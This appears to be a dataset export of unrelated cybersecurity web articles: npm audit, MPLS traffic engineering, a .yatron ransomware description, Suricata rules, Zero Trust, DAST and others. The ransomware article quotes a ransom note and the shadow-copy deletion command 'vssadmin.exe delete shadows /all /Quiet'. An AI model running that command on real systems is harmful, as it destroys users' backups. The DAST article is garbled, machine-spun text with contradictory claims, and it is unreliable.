content
stringlengths
194
506k
The volume and sophistication of cyberattacks continues to overwhelm most organizations. A layered security approach can work if streamlined and modernized. AI and machine learning are leading technologies that help safeguard organizations. But security professionals still need to think beyond using AI for file based malware attacks. Download the Forrester Market Overview: Endpoint Security Report Summary to learn how AI driven solutions can be more effective than traditional signature based AV.
When a user makes a request to an application, the X-Forwarded-For HTTP header stores the client IP. However, since edge nodes mediate requests to an edge application, the header also stores other addresses in the request route in addition to the client IP address. To isolate the client IP, you must forward it to a new header by creating a rule using Rules Engine for Edge Application. To send the original client IP through a new request header, follow these steps: - Access Real-Time Manager. - On the top-left corner of the page, go to Products menu, represented by the three horizontal lines, and under the BUILD section, select Edge Application. - Select the edge application you want to apply the solution to. - Click the Rules Engine tab > select the Default Rule. - In the Behavior section, click the + button. - In the new behavior field, select Add Request Header. - In the argument field, add the following string: - Click the Save button. After completing the alteration in Rules Engine, the IP address of the client that originated the request will be added to the
Vulnerabilities can lay dormant and undetected throughout the application lifecycle, causing mayhem once an attacker discovers them. These attackers use rudimentary and sophisticated techniques to exploit the existing vulnerabilities within applications. Developers usually pay attention to the vulnerabilities present within the application code. However, the most common threats to applications are the vulnerabilities that various libraries bring in. Node.js implements the NPM audit function to address these issues when using third-party libraries within a project. This post will discuss how to treat NPM audit findings to ensure application security. NPM audit is a command within the NPM CLI that allows developers to run vulnerability audits on the dependencies configured in the project. The NPM audit command can evaluate each version of the dependencies against known vulnerable versions to determine whether the current dependencies used within the project are vulnerable. It also allows you to fix most findings from the NPM audit command automatically. However, it is essential to understand that updating specific libraries could break the application’s behavior. How to use the NPM audit command Node.js makes it easy to use the NPM audit command by simplifying the operational and reporting aspects. As a result, developers don’t require prior security-related training to run vulnerability audits against their projects. Use the following command to start the audit process. This command displays the results of the audit on the CLI in an easy-to-read format. The following command allows you to switch the output format of the results to a JSON format quickly, which can be beneficial for programmatic visualizations. npm audit --json Use the following option to filter the findings by severity. npm audit –audit-level=critical Also remember that, by default, the NPM package installation invokes the NPM audit command to ensure that no vulnerabilities are introduced during the installation of a new package. NPM audit report components The NPM audit report contains multiple components that allow you to obtain crucial information necessary to remediate the findings and understand each dependency’s location. The following components make up a common finding: Each of these components indicates a particular aspect of the finding. Therefore, understanding these components allows you to remediate vulnerabilities more effectively. The severity of the finding takes into account the vulnerability’s impact and exploitability in most everyday use cases. An NPM audit result can contain four levels of severity: - Critical: Highest severity that requires immediate attention. - High: These findings need developers to address them urgently. - Moderate: These findings are of medium severity and developers have more time to address them. - Low: These findings are of the lowest severity and developers can remediate them at their convenience. The vulnerability description indicates the vulnerability affecting the current library version, for example, Denial of Service. The package name mentioned with the audit finding indicates the specific package the vulnerability resides in. Thus, you can focus your efforts on this particular package to remediate the findings. This dependency indicates the module of the package on which the vulnerability depends. The patch indicates the code that contains the specific vulnerability. This field usually contains the link to a security report that has more information regarding the specific vulnerability. Reading NPM audit results Even though developers may not require specific security training to understand the NPM audit results, you do need to understand each component within the audit results to remediate each find effectively. You need to read and understand the specific fields of the findings to determine the right course of action. Focus on the findings with the highest severity and work their way down until they remediate all vulnerabilities within the project’s dependencies. Remediate NPM audit findings NPM audit is not only a feature that allows the audit of project dependencies to uncover vulnerabilities, but it is also capable of allowing you to fix each of the findings quickly. Security best practices dictate that developers employ a severity-based remediation effort to streamline the remediation of multiple findings. This means that conclusions with higher severities require prompt actions to remediate since they carry the most impact on the application. Use the following command to automate the remediation process, remediating all possible vulnerabilities within all compatible packages, thus saving time and effort. npm audit fix However, it is essential to note that this command only works when there are existing updates to the vulnerable packages identified during the audit. One of the common flags that helps developers is the “dry-run” flag. It allows you to run the fix command without implementing any fixes. In addition, you can inspect the changes that NPM makes during the automatic remediation function before it makes the changes where the dependencies may break the application. npm audit fix --dry-run --json If the fix requires moving to a major version upgrade, you must add the force flag to the command. However, it is essential to understand that upgrading to a major version could break the application. Therefore, this approach is not recommended. npm audit fix –force To remediate vulnerabilities within packages manually, use the npm install command to upgrade each package. This is the most common approach, since you can define the package and specific version to which to upgrade. npm install [email protected] Exceptions that might stand out during a typical NPM audit would be findings that currently do not have any fixes available. There may be cases where NPM cannot automatically upgrade the packages and thus require manual intervention. In these specific cases, the NPM audit results will show additional details on remediating the identified vulnerabilities. In this article, I have discussed how developers can treat NPM audit findings to ensure their applications are secure. These practices ensure that dependencies do not introduce any vulnerabilities into the application that could jeopardize the security of the application. I hope you have found this article helpful. Thank you for reading!
Segment Routing is gaining steam among the service provider community for its simplicity, especially as they adopt SDN for centralized control. In this two-part blog series, I’ll examine current and future methods of MPLS traffic engineering. In this first post, I explain MPLS Traffic Engineering (MPLS-TE) and Resource Reservation Protocol-TE (RSVP-TE), the technology widely in use today to implement traffic engineering. In part two, I’ll cover Segment Routing. MPLS Traffic Engineering: As we all know, networks exist to deliver data packets between different endpoints. In a traditional IP-based network, data packets are forwarded on a per-hop basis. Each router between the source and destination does a route look-up and selects the lowest cost path upon which to forward packets. The disadvantage of this is that if a path is found to be optimal due to its low cost, every router in the network will tend to use that path to forward packets. This holds even when other underused but higher cost paths are available. This approach to data transmission can cause performance issues such as packet drops or latency on the chosen path. With Traffic Engineering (TE), rather than routing decisions being made at each hop, the network operator’s headend1 ingress router determines the source to destination path for specific traffic. This way, traffic that would have taken an optimal but congested path may be directed through underused paths in the network, helping distribute bandwidth load across different links. MPLS TE network with TE tunnels (Cisco Press MPLS Traffic Engineering) For TE to work, TE tunnels that use separate paths from a source to destination edge router are configured by the network operator. Interior Gateway Protocols (IGP) such as OSPF and IS-IS collect information about the network topology and the availability of the resources. They update information about the links in the IGP domain to all the other routers within the network. This data helps the headend ingress router in the IP/MPLS network analyze the traffic patterns and availability of resources across the links and compute the best hop-by-hop path for the TE tunnels between different endpoints. A TE tunnel, in addition to the bandwidth requirements, can also include Class of Service (CoS) requirements of the data to be forwarded using the tunnel. Once the TE tunnels are created and the bandwidth requirements of the traffic are understood, data is forwarded across the TE tunnel to its destination using MPLS label switching. In addition to helping with congestion avoidance on the primary link, Traffic Engineering also allows for failover when the primary path or tunnel between two endpoints in the network fails, by providing Fast Reroute (FRR) on the TE tunnels. Resource Reservation Protocol –Traffic Engineering (RSVP-TE): Resource Reservation Protocol (RSVP) reserves resources along the end-to-end path of a traffic flow in an IP network. An RSVP request consists of a FlowSpec that specifies the Quality of Service (QoS) requirement for the traffic flow and a FilterSpec that defines which flow must receive the QoS priority. Once the necessary bandwidth is reserved along the path with RSVP, the application that made the request begins to transmit the traffic. RSVP is often used by real-time and multimedia applications to set up bandwidth reservations. The RSVP signaling protocol was extended with MPLS features to support MPLS TE. This enabled RSVP to set up label switched paths2 (LSP) in an MPLS TE network. With RSVP-TE, the headend router sends an RSVP PATH message that checks the availability of requested resources on all the label switched routers (LSR) in the path on which the TE tunnel is to be created. Upon receiving the PATH message, the tailend3 router in the path then confirms the reservation with an RSVP RESERVATION message, which confirms the assignment of an LSP to a TE tunnel. This message is then propagated upstream to the headend router through all the LSRs along the future TE tunnel path. After all the LSRs in the path accept and confirm the LSP, the MPLS TE LSP is operational. With this, the headend router can then direct traffic through new tunnels based on requirements, and your traffic engineered MPLS network is ready. In the next part, we will look at the new buzz in Traffic Engineering: Segment Routing. For more information: Detailed steps in RSVP path reservation: Instructions on configuring RSVP-TE on a Cisco ASR 9000: - Headend – The upstream, transmit end of a tunnel. The router that originates and maintains the traffic engineering LSP. - LSP—label-switched path. A sequence of hops (R0…Rn) in which a packet travels from R0 to Rn through label switching mechanisms. A label-switched path can be chosen dynamically, based on normal routing mechanisms, or through configuration. - Tailend – The downstream, receive end of a tunnel. The router that terminates the traffic engineering LSP. Glossary of additional terms: http://www.cisco.com/c/en/us/td/docs/ios/12_0s/feature/guide/fs_areat.html#wp1033446
The .yatron ransomware is a dangerous crypto virus that aims to encrypt sensitive user data. According to the available code analysis it is a heavily modified version of Hidden Tear family of threats. The released security reports indicate that it is very possible that the hacker group has taken the base code and modified it accordingly to produce a radically different version of the Hidden Tear ransomware family. One of the noteworthy features of this particular threat is that it uses two particular exploits which have been etched long age — EternalBlue and DoublePulsar. It can also be spread via the most common distribution techniques — phishing emails, dangerous payloads and browser hijackers. As soon as the .yatron ransomare is released to the victims the built-in sequence of commands will be started. Depending on the exact configuration set by the hackers it can launch various malicious actions such as the following: - Information Gathering — There are many data types which can be extracted from the infected machines. They can both identify the victim users themselves or the machines. This is a very dangerous technique as it can both reveal personal information about the users leading to the possibility of running financial abuse and identity theft crimes. The harvested machine information can be used to craft an unique ID that can be assigned to each individual computer. - Applications and Services Bypass — The collected information can be used to identify if any security software is installed and their engines can be bypassed. The list of potential targets includes anti-virus programs, sandbox environments, virtual machine hosts and etc. - Windows Registry Changes — Some viruses can alter the values stored inside the Windows Registry. This can lead to severe performance issues to the point of making the computers completely unusable until the threat is removed. As the Registry values are used by the applications in order to store valuable information any modification to it can lead to unexpected errors and data loss. - Boot Options Changes — The malware can modify the system’s settings in order to automatically launch the virus engine as soon as the computer is powered on. This will additionally block access to the recovery boot menus and certain services which will render manual user removal guides non-working. The .yatron ransomware infections can be configured to carry out all kinds of dangerous actions including the delivery of other malware samples. Advanced .yatron ransomware samples can also be set to remove sensitive files from the affected computers — backups, system restore points and shadow volume copies. As soon as all components have finished running the actual encryption process will start. A strong algorithm and a built-in list of target file type extensions will be used in order to carry out this procedure. In the the .yatron extension will be applied to the victim files. The ransomware note will be crafted in a text file which reads the following text: Your personal files are encrypted By Yatron Oops ,Your Files Have Been Encrypted your important files are encrypted ! Your documents, photos, databases and Other personal files are encrypted ? the files that you looked for not readable ? We are the only ones who can decrypt your files Through the unique key. what should I do for decrypting my files? If you want to recover your files, you must purchase a the unique key send 0.5 btc to the payment address : *** Send us your ID after your payment Email to contact us : [email protected] As proof you can email us 2 files to decrypt and we will send you the recover files to prove that we can decrypt your files you have 3 Days to pay or Your files will be deleted |Short Description||The ransomware encrypts files on your computer machine and demands a ransom to be paid to allegedly restore them.| |Symptoms||The ransomware will blackmail the victims to pay them a decryption fee. Sensitive user data may be encrypted by the ransomware code.| |Distribution Method||Spam Emails, Email Attachments| |Detection Tool|| See If Your System Has Been Affected by .yatron Ransomware | Malware Removal Tool |User Experience||Join Our Forum to Discuss .yatron Ransomware.| |Data Recovery Tool||Windows Data Recovery by Stellar Phoenix Notice! This product scans your drive sectors to recover lost files and it may not recover 100% of the encrypted files, but only few of them, depending on the situation and whether or not you have reformatted your drive.| .yatron Ransomware – What Does It Do? .yatron Ransomware could spread its infection in various ways. A payload dropper which initiates the malicious script for this ransomware is being spread around the Internet. .yatron Ransomware might also distribute its payload file on social media and file-sharing services. Freeware which is found on the Web can be presented as helpful also be hiding the malicious script for the cryptovirus. Read the tips for ransomware prevention from our forum. .yatron Ransomware is a cryptovirus that encrypts your files and shows a window with instructions on your computer screen. The extortionists want you to pay a ransom for the alleged restoration of your files. The main engine could make entries in the Windows Registry to achieve persistence, and interfere with processes in Windows. The .yatron Ransomware is a crypto virus programmed to encrypt user data. As soon as all modules have finished running in their prescribed order the lockscreen will launch an application frame which will prevent the users from interacting with their computers. It will display the ransomware note to the victims. You should NOT under any circumstances pay any ransom sum. Your files may not get recovered, and nobody could give you a guarantee for that. The .yatron Ransomware cryptovirus could be set to erase all the Shadow Volume Copies from the Windows operating system with the help of the following command: →vssadmin.exe delete shadows /all /Quiet If your computer device was infected with this ransomware and your files are locked, read on through to find out how you could potentially restore your files back to normal. Remove .yatron Ransomware If your computer system got infected with the .yatron Files ransomware virus, you should have a bit of experience in removing malware. You should get rid of this ransomware as quickly as possible before it can have the chance to spread further and infect other computers. You should remove the ransomware and follow the step-by-step instructions guide provided below.
Security is critical to Chrome, and many features protect Chrome users as they browse the web. Google Safe Browsing warns users away from websites known to be dangerous. Chrome’s sandbox and multi-process architecture provide additional layers of defense by helping block malware installation and reducing the severity of vulnerabilities. In Chrome 56, we’ve added yet another layer of defense by fully isolating Chrome extension privileges from web pages. Chrome has always kept extensions and web pages in different processes where possible, but sometimes extensions host web content in iframes. For example, an extension’s options page may include social network buttons or ads. Until recently, these web iframes ran inside the extension’s process. This is usually safe because security checks inside that process do not allow web iframes to use extension APIs. However, in rare cases malicious web iframes could exploit bugs to bypass these checks and use the same privileged APIs that are available to extensions, like chrome.history. Chrome now uses out-of-process iframes to ensure that extension-hosted web iframes are never put into their parent extension process. Even if an extension’s web iframe finds a Chrome bug and takes over its own web process, that process won’t have access to extension APIs. With this launch, web iframes in extension pages now run in a separate process from the extension, adding an extra layer of protection to privileged APIs. Introducing out-of-process iframes will greatly strengthen Chrome’s security model, though building them required a large change to Chrome’s architecture affecting systems like painting, input events, and navigation. This launch is just the first phase of our Site Isolation project, so stay tuned for even more security improvements that out-of-process iframes make possible.
HyBIS: Advanced introspection for effective windows guest protection Effectively protecting the WindowsTM OS is a challenging task, since most implementation details are not publicly known. Windows OS has always been the main target of malware that have exploited numerous bugs and vulnerabilities exposed by its implementations. Recent trusted boot and additional integrity checks have rendered the Windows OS less vulnerable to kernel-level rootkits. Nevertheless, guest Windows Virtual Machines are becoming an increasingly interesting attack target. In this work we introduce and analyze a novel Hypervisor-Based Introspection System (HyBIS) we developed for protecting Windows OSes from malware and rootkits. The HyBIS architecture is motivated and detailed, while targeted experimental results show its effectiveness. Comparison with related work highlights main HyBIS advantages such as: effective semantic introspection, support for 64-bit architectures and for recent Windows versions ( >=>= win 7), and advanced malware disabling capabilities. We believe the research effort reported here will pave the way to further advances in the security of WindowsTM OSes.
The optional merge filters are : A specific filter is only active when the checkbox on the left side is selected : ● Only SIP : only the SIP messages and no other network traffic is kept in the merged output ● Only this Date : only the packets on the specified Date are kept in the merged output ● Only this Timeframe : only the packets between the Start and End time are kept in the merged output ● Only these IP addresses : only the packets that belong to the list of the given network IP address ranges are kept in the merged output. How the IP address ranges can be entered is explained below. ● No syslog : no syslog packets in the merged output The syntax of the IP address range is as follows : <IP address> [/<network prefix>] [<separator>] [<IP address>] [/<network prefix>] [<separator>] The brackets [ ] indicate an optional element. <IP address> is any valid IPv4 address. See also https://en.wikipedia.org/wiki/IPv4 The / character is to use a network prefix (see next). <network prefix> is a whole number ranging from 0 to 32. The given number indicates the netmask where 0 stands for 0.0.0.0 (all IP addresses) and 32 stands for 255.255.255.255 (one single IP address). Omitting the network prefix assumes one single IP address (equivalent with /32). <separator> can be a semicolon ; or comma , Examples of "Only these IP addresses" : 10.20.30.40 means only one single IP address 10.20.30.40 10.20.0.0 /16 means the network ranging from IP address 10.20.0.0 to IP address 10.20.255.255 10.0.0.0 /8 ; 172.16.0.0 /12 ; 192.168.0.0 /16 means the network ranges 10.0.0.0 - 10.255.255.255, 172.16.0.0 - 172.31.255.255 and 192.168.0.0 - 192.168.255.255.
Hi Cybrarians,I recently integrated Suricata tool into our application to block malicious traffic. Here are my 2 cents in this article on why Suricata is a great engine to be installed to mark your traffic prior communicating to the world.About Suricata Suricata is a signature based system, built to perform Intrusion Detection, Prevention, and Network Monitoring along with Offline Pcap captures.Installing Suricata on Ubuntu: https://linuxpitstop.com/install-suricata-ids-on-ubuntu-16-04/Suricata.To configure Suricata engine, we need to tweak the suricata.yaml file. Once you have configured the engine, it's all about launching the engine and inspection.Suricata Rule Set Suricata has been integrated with VRT Ruleset and Emerging Threats Suricata ruleset . However, we can write our custom rules to block based on the malicious behavior, Threats or Policy Violation.Below is a sample rule which I have written to block all ICMP traffic.drop icmp any any -> any any (msg:"DROP test ICMP ping from any network ";icode:0; itype:8; classtype:trojan-activity; sid:99999999; rev:1;) Suricata has a capability for a deep inspection when the above rule is triggered, it inspects each UDP packet for itype: 8 ( Ech0) and blocks ICMP traffic. We can block traffic based on inspection of protocol parameters, contents and port and this is regardless of any type of traffic.How is Suricata better than other IPS engines? How to make Suricata work as an IPS Engine - It provides Multithreading functionality which is not available in traditional Snort-based IPS. - The Outputs can be integrated with dashboards such as Kibana, Logstash. - We can monitor even TLS keys to check if there are any communication with less reputable CA. For Suricata to work in IPS mode, below was my workflow - Setup an IPSEC tunnel between the client computer and server using Strong Swan. - Using Strong Swan plugin, I was able to capture the Source IP address. - Python Script: It's going to fetch the Source IP address and create custom rules. - Python Script: Custom rules are loaded for Suricata and a live reload. - Customer send a traffic to Strongswan - Python script creates an NFQUEUE and forwards all the traffic to Suricata. - Suricata based on the custom rules blocks the traffic which hit the custom rules.
Complexity has outstripped legacy methods of cybersecurity as there is no single, easily identified perimeter for enterprises. As a result, security teams are shifting network defenses toward a more comprehensive IT security model to accommodate this new security climate. The Zero Trust approach enables organizations to restrict access controls to networks, applications and environments without sacrificing performance and user experience. Simply stated, it’s an approach that trusts no one. As more and more organizations leverage cloud computing, the traditional network security perimeter has all but vanished, and security teams are finding it difficult to identify who and what should be trusted with access to their networks. As a result, a growing number of organizations are considering adopting a Zero Trust network architecture as a key component of their enterprise security strategy. What is a Zero Trust Architecture? Perimeter network security focuses on keeping attackers out of the network. However, this traditional approach is vulnerable to users and devices inside the network. Traditional network security architecture leverages firewalls, access controls, intrusion prevention systems (IPSs), security information and event management tools (SIEMs) and email gateways by building multiple layers of security on the perimeter — layers that cyber attackers may have already learned to breach. “Verify, then trust” security trusts users inside the network by default. So anyone with the right user credentials can potentially be admitted to the network’s complete array of sites, apps and devices. Zero Trust assumes the network has been compromised and challenges the user or device to prove that they have an acceptable risk level. It requires strict identity verification for every user and device attempting to access resources on a network, even if the user or device are already within the network perimeter. Zero Trust also provides the ability to limit access once anyone is inside the network, preventing an attacker from exploiting lateral freedom throughout an organization’s infrastructure. Recently, Zero Trust, as a concept came into focus when U.S. President Joe Biden issued an executive order requiring agencies to have a plan to adopt a Zero Trust framework within 90 days. The order also provided clear recommendations and timeframes for public and private organizations to implement key technology and process improvements. Zero Trust enables organizations to reduce risk to their cloud and container deployments while also improving governance and compliance. Organizations can gain insight into users and devices while identifying threats and maintaining control across the network. A Zero Trust approach can help identify business processes, data flows, users, data and associated risks. The model helps to set policy rules that can be automatically updated based on associated risks,. Adopting Zero Trust enables organizations increase their level of continuous verification, enabling them to detect intrusions and exploits quickly in order to help stop attacks before they can succeed: Phishing emails targeting employees Lateral movement through corporate network Redirecting a shell to a service to compromise a corporate machine Stolen developer password Stolen application database credentials Exfiltration of database via compromised application host Compromising application host via privileged workstation Using developer password to elevate application host privileges Installing keylogger via local privilege escalation on workstation Organizations seeking to implement a Zero Trust security framework must address the following: Identify Sensitive Data – Identify and prioritize data according to risk: know where it lives and who has access to it. Limit and Control Access – Establish limits to users, devices, apps and processes seeking data access; a least-privilege access control model should be limited to a “need-to-know” basis. Detect Threats – Monitor all activity continuously related to data access, comparing current activity to baselines built on prior behavior and analytics; combining monitoring, behaviors, rules, and security analytics enhances the ability to detect internal and external threats. A strong Zero Trust security model features the following principles: Authenticated access to all resources – Zero Trust views every attempt to access the network as a threat. While traditional security often requires nothing more than a single password to gain access, multi-factor authentication (MFA) requires users to enter a code sent to a separate device, such as a mobile phone, to verify they are in fact who they claim to be. Least privilege-controlled access – Allowing the least amount of access is a key principle of Zero Trust. The objective is to prevent unauthorized access to data and services and make control and enforcement as granular as possible. Zero Trust networks grant access only when absolutely necessary, rigorously verifying requests to connect to systems and authenticating them beforehand. Constricting security perimeters into smaller zones to maintain distinct access to separate parts of the network limits lateral access throughout the network. Segmented security becomes increasingly important as workloads become more mobile. Inspect and log activity using data security analytics – Continuous monitoring, inspection and logging of traffic and activities. User account baselines should be established to help automatically identify abnormal behaviors indicative of malicious activity Why Lookout Zero Trust? Lookout Continuous Conditional Access (CCA) provides a modern approach to Zero Trust. WIth insights into endpoints, users, networks, apps and data, Lookout provides unprecedented visibility to organizations, enabling them to effectively detect threats and anomalies, support compliance requirements and stop breaches. From an endpoint perspective, CCA enables you to create policies that take into account typical threat indicators such as malicious apps, compromised devices, phishing attacks, app and device vulnerabilities, and risky apps. Our access platform monitors for anomalous user behavior such as large downloads, unusual access patterns, and unusual locations. And data loss prevention (DLP) indicates the risk sensitivity of what someone on the network might be attempting. Leveraging device telemetry and advanced analytics, the platform enables organizations to respond efficiently and intelligently. You can restrict access to sensitive data, request step-up authentication, or take specific action on content, such as masking or redacting certain keywords, applying encryption and adding watermarks. In the event of a breach, you can shut down access altogether. With Lookout CCA, your organization is in complete control, protected from endpoint to cloud. That’s the key benefit of an integrated security and access platform. And it’s the way a modern Zero Trust architecture should be designed. To learn more about our endpoint-to-cloud solution, check out our SASE solution page.
While the online platforms are getting bigger every single day the online threats are keeping up as well. With privacy and security concerns worldwide the number of threats is surely large. There are cybercriminals that are always up to something that can potentially harm you in different ways. Sometimes they aim for your personal data including address, passwords, name, bank account details, and other things. Now a new malware is in news and this is quite a sneaky one that is similar to a phishing technique. The malware gets into your system through phishing mail and the victim opens the mail that lets the mail in. Banking users are mainly targetted with this malware and their credit card details and password etc are at risk. Once the malware has entered the system through phishing a zip file gets installed and it steals data from the user. This malware acts upon the browsers and stops it fro auto-filling the details while banking so the user has to manually enter the details or passwords. While the details are manually filled by the user the keylogger in malware collects this data and successfully steals your data. The next thing you know is that your details are sent to the server accessed by the attacker. This malware is called Metamorfo Banking Trojan and a campaign with this malware targeting multiple banks. around 20 banks from different countries around the world are under this malware risk. Us, Canada, Peru, Ecuador, Brazil, Mexico, and Chile are targeted by this campaign. The Trojan is as sneaky as it seems with the phishing that once makes through the users makes a successful attack. With phishing, this malware is sent as an invoice or invite fir downloading some file. The malware can even bypass the antivirus even by going through virus detection.
Stratosphere IPS[Stratoshere IPS -- till 2016/10/01] The Stratosphere IPS is a free software Intrusion Prevention System that uses Machine Learning to detect and block known malicious behaviors in the network traffic. The behaviors are learnt from highly verified malware and normal traffic connections in our research laboratory. Its goal is to provide the community and especially vulnerable targets with low budgets such as NGO's and civil society groups with an advanced tool that can protect against targeted attacks. - The project's own website The Stratosphere IPS project was born in the CTU University of Prague in Czech Republic, as part of the PhD work of Sebastian García. The core of the Stratosphere IPS is a machine learning algorithm that analyzes individual network connections to extract their behavioral pattern. The patterns of known malicious connections are used to train the system and can subsequently be used to detect unknown traffic in new networks. The algorithms were publicly published and the behavioral models are continually being verified by academic researchers. Scanning your network is a very security and privacy sensitive matter. Because Stratosphere is published as a free software product, you do not have to trust it - you get to inspect every aspect of its inner workings and can freely improve upon it. It is already being used across the world - within multinationals, NGO's and academia. The design goal of the Stratosphere IPS is to develop a highly advanced and free network-based malicious actions detector that can help protect individuals, middle-size organizations, NGOs and almost any type of network. Agent Technology Center, CTU University of Prague
What is DAST (Dynamic Application Security Testing)? What is DAST (Dynamic Application Security Testing)? The Dynamic Application Security Testing (DAST) definition refers to a particular kind of application or white box testing (AppSec testing) in which the operating system under test is analyzed while it is being used, but the testers have no access to the ASCII text file or understanding of the application's internal communication or blueprint at the system level. This "black box" testing analyses groupware from the outside in, analyses its operating state, and observes its reactions to simulated ambush made by a testing tool. The way an app reacts in these simulations can shed light on whether or not it is vulnerable to a real-world attack. How Does DAST Work? To test an application's easiness to DAST attacks, systems like these would seek out vulnerable input fields and then feed them a wide variety of unexpected or malicious data. These can range from standard attempts to exploit amenabilities like SQL injection commands and Cross-site scripting (XSS) flaws to less prevalent inputs that may reveal problems with input validation and memory management. The DAST tool determines whether an application is defenseless to a given attack vector by perceiving how it behaves to a series of inputs. There is a security hole if, for instance, a SQL injection attack grants unrestricted admission to info or if the application fails to load because of erroneous or corrupt input. Why is DAST Important? There is no chance that security vulnerabilities in applications are going away any time soon; this is where Application Security Testing comes in. CNBC found that over 75% of applications are susceptible in some fashion. Developers often make simple security mistakes that have far-reaching consequences, such as failing to properly validate user input, disclosing the server's version, or relying on outdated or insecure software libraries. You may be wondering how DAST scanning is any different from the slow, static, and time-consuming methods of traditional penetration testing or static application security testing. DAST is different since it is always evolving. This implies that the tests are executed in real-time to mimic how an actual application would function. Dynamic testing is typically carried out on a live system, also known as a Production Environment. Types of DAST While there are no recognized subtypes of DAST, security professionals classify DAST technologies into two informal groups: modern and legacy. Here are their primary differences: Automation and integration: Previous DAST applications were made for manual, on-demand scanning. Even though the scanning process is automated, the tool does not offer any additional automation and merely compiles and displays a list of DAST security flaws. However, state-of-the-art DAST solutions are typically activated by an automation server like Jenkins and are designed to operate invisibly as part of the SDLC, out of sight of the user. After a scan is complete, the results are uploaded to the developers' ticketing system. Vulnerability confirmation/validation: Simple testing is all that is possible with legacy DAST tools, which consist of sending a request, receiving a response, and determining whether or not the response indicates a vulnerability. There are no other provided weakness confirmation techniques. Conversely, the requirement for manual validation by penetration testers or security engineers has been removed thanks to the prevalence of contemporary DAST tools, which frequently carry out checks that confirm the vulnerability with 100% certainty and produce proof of exploitation. Dynamic Application Security Testing: Advantages and Disadvantages DAST has both benefits and drawbacks for scanning runtime applications. We'll detail the advantages and downsides of utilizing a DAST tool so you can decide if it's right for you. - Totally app-free DAST tools don't touch an app's source code, so they're compatible with any platform or language. So, a single DAST tool may operate on all your applications, even if they're different but often interact. DAST tools are cost-effective and good for performing widespread security checks quickly. - No setup problems DAST finds security vulnerabilities in fully-functional applications. DAST scanners can find configuration issues that other security scanning tools may miss because they look at your application from the outside. DAST scanners can identify setup errors that aren't obvious from the code. - Low Rate of Misdiagnoses The OWASP Benchmark Project revealed that DAST tools have a lower-than-average number of false positives. DAST scanners are reliable and should be used by IT security teams. - Good penetrating tester By manually executing penetration testing with a DAST scanner, you can automate various penetration operations to examine how your system responds to intrusions and catches attack payloads. This gain is strongly connected with operator skills; therefore, security specialists or program managers will maximize it. Although DAST has many benefits, it is not a one-stop shop for fixing all problems. DAST has a number of significant drawbacks, the most notable ones are: - Late appearance in SDLC DAST requires access to a running program, thus it is only conducted late in the Software Development Lifecycle (SDLC) when it is more costly to fix flaws. - Vulnerability Location Although DAST solutions can determine that a vulnerability exists in an application, they are unable to pinpoint where the vulnerability is situated within the codebase since they do not have access to the source code. - Code Coverage Since DAST solutions analyze a live program, they can miss security flaws in inaccessible areas of the code (due to incomplete code coverage). Differences Between DAST and SAST Dynamic application security testing (DAST) is distinct from its static counterpart since it mimics an actual attack on the application. These attacks are carried out by a DAST scanner, which then looks for anomalies in the results to pinpoint potential security flaws. In contrast, static application security testing (SAST) examines an application's source code from the inside out. The language and web framework must be supported by the SAST scanner. Instead, DAST scanners are external to a program and communicate with it over HTTP. Using both SAST and DAST is recommended for the greatest possible improvement in security. To resolve the tension between dynamic application security testing (DAST) and static application security testing (SAST), the grey-box approach of interactive application security testing (IAST) should be established. How And When to Use DAST? DAST is helpful for monitoring web application security in real-time and identifying server or database configuration errors that compromise security. Unlike SAST, it can detect flaws in authentication and encryption that allow for unwanted access. Additionally, DAST can test the IT infrastructure resources, such as networking and data storage, that your web application makes use of. This means that DAST can be used to test not only your application or web services but the complete IT environment they are embedded in. Implementation of DAST DAST is not as easy to integrate into your testing pipeline as SAST is because it is dependent on your application being run. Although DAST can be automated, the manual steps necessary to prepare the process for automation must first be recorded. After integrating a DAST tool into your pipeline, there is a certain procedure that must be performed. - Ask your customers for opinions As the first step in DAST testing implementation, observing how users interact with your software is invaluable. Don't just keep track of their actions; have them explain them as well. Frequent interactions in an application can cause users to lose track of what they are doing. Users are better able to concentrate on their work as a result, but the fact that they don't have to give much thought to what they're clicking on is no guarantee that it won't cause trouble down the line. - Automate user interactions The next step is to script the user's activities using an automation tool. This may be easier to accomplish with command line and API programs than with graphical user interface programs, but it is theoretically conceivable with any of these. - Add the test scripts to your ci/cd pipeline When you've finished automating the most crucial parts of your application's interactions, run these scripts against your application while a DAST tool analyses it. It is possible to begin addressing security flaws after the initial DAST run. - Add regression tests to the testing suite As you discover security holes in your app's regular use, you can patch them by including scripts that mimic those real-world scenarios in your test suite. This guarantees that the problems will never arise again. The Wallarm vulnerability and incident detection module identifies application-specific flaws and actively evaluates threats to isolate high-risk incidents from a sea of non-threatening assaults. The Wallarm NG-WAF module also collects attack data that is then processed by the Wallarm DAST. Wallarm parses malicious requests for their payload, attack type, and application endpoint, and then generates scanner tests based on this information. When an existing application vulnerability was the target of the attack, Wallarm DAST can determine this and provide a ticket for fixing the problem. All existing or future DevOps should include a security technology that does not impede development speed. The second most popular AST method, after static application security testing (SAST), is dynamic application security testing. Both established and up-and-coming businesses are increasingly integrating DAST into their workflows for creating new software. It's true that Dynamic Program Security Testing is effective at discovering flaws in your application that only manifest at runtime, but this type of testing can never be guaranteed to locate every possible security hole. You should not expect this tool to give you comprehensive protection for the application that you seek. This is why some companies employ many AST tools in their development setting. Multiple AST (Application Security Testing) tools are better than one when it comes to finding security flaws in software.
Machine learning is one concept that has, in the recent past, greatly invaded the cybersecurity domain and is changing it for the better. In today’s context, it would be impossible to deploy effective cybersecurity technologies without relying on machine learning. Machine learning reduces the amount of time spent on routine tasks and helps organizations use their resources strategically. Machine learning makes cybersecurity simpler, less expensive, more proactive, and far more effective. What is Cybersecurity? Cybersecurity involves protecting inter-connected systems like hardware, software, electronic data, etc. The main purpose of cybersecurity is to prevent data breaches, identity theft, and cyberattacks which can help in risk management. If an organization has a strong sense of network security and an effective incident response plan, it will be easier for it to prevent and mitigate cyberattacks. What is Machine Learning? Machine learning refers to machines being able to learn by themselves without being explicitly programmed. It is an application of AI which enables systems to learn and improve from experience automatically. While working with machine learning, various sets of algorithms are required. These algorithms use a set of training data to enable computers to learn. Challenges of the Cybersecurity Domain Though machine learning is helping the field of cybersecurity prosper, it still has the following challenges to overcome. - Anomaly detection is challenging to define as it needs a clear definition of what is considered the normal activity. - The methods and tactics of cyberattacks constantly change. Due to this, models must quickly be able to adapt to new patterns and behavior. - False positives can be costly with respect to data privacy and infrastructure. - Attackers use machine learning methods to power their attacks by creating new malware, phishing content, possible flags, self-protection of infected nodes, and identifying recurring patterns. Machine Learning Use Cases For Cybersecurity Some of the ways in which machine learning improves cybersecurity are: 1. Risk Detection Machine learning is used to analyze, 